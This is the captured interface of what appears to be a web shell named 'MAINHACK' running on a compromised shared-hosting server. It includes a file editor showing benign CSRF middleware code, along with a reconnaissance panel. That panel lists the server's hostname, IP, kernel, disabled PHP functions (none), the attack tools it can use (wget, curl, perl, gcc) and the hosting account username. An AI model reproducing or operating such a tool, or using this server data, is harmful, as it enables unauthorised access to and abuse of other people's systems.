[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.js
// src/middleware/csrf/index.ts import { HTTPException } from "../../http-exception.js"; var secFetchSiteValues = ["same-origin", "same-site", "none", "cross-site"]; var isSecFetchSite = (value) => secFetchSiteValues.includes(value); var isSafeMethodRe = /^(GET|HEAD)$/; var isRequestedByFormElementRe = /^\b(application\/x-www-form-urlencoded|multipart\/form-data|text\/plain)\b/i; var csrf = (options) => { const originHandler = ((optsOrigin) => { if (!optsOrigin) { return (origin, c) => origin === new URL(c.req.url).origin; } else if (typeof optsOrigin === "string") { return (origin) => origin === optsOrigin; } else if (typeof optsOrigin === "function") { return optsOrigin; } else { return (origin) => optsOrigin.includes(origin); } })(options?.origin); const isAllowedOrigin = async (origin, c) => { if (origin === void 0) { return false; } return await originHandler(origin, c); }; const secFetchSiteHandler = ((optsSecFetchSite) => { if (!optsSecFetchSite) { return (secFetchSite) => secFetchSite === "same-origin"; } else if (typeof optsSecFetchSite === "string") { return (secFetchSite) => secFetchSite === optsSecFetchSite; } else if (typeof optsSecFetchSite === "function") { return optsSecFetchSite; } else { return (secFetchSite) => optsSecFetchSite.includes(secFetchSite); } })(options?.secFetchSite); const isAllowedSecFetchSite = async (secFetchSite, c) => { if (secFetchSite === void 0) { return false; } if (!isSecFetchSite(secFetchSite)) { return false; } return await secFetchSiteHandler(secFetchSite, c); }; return async function csrf2(c, next) { if (!isSafeMethodRe.test(c.req.method) && isRequestedByFormElementRe.test(c.req.header("content-type") || "text/plain") && !await isAllowedSecFetchSite(c.req.header("sec-fetch-site"), c) && !await isAllowedOrigin(c.req.header("origin"), c)) { const res = new Response("Forbidden", { status: 403 }); throw new HTTPException(403, { res }); } await next(); }; }; export { csrf };
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium331.web-hosting.com
Server IP: 184.94.213.169
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium331.web-hosting.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: livedhms
User ID (UID): 1344
Group ID (GID): 1349
Script Owner UID: 1344
Current Dir Owner: 1344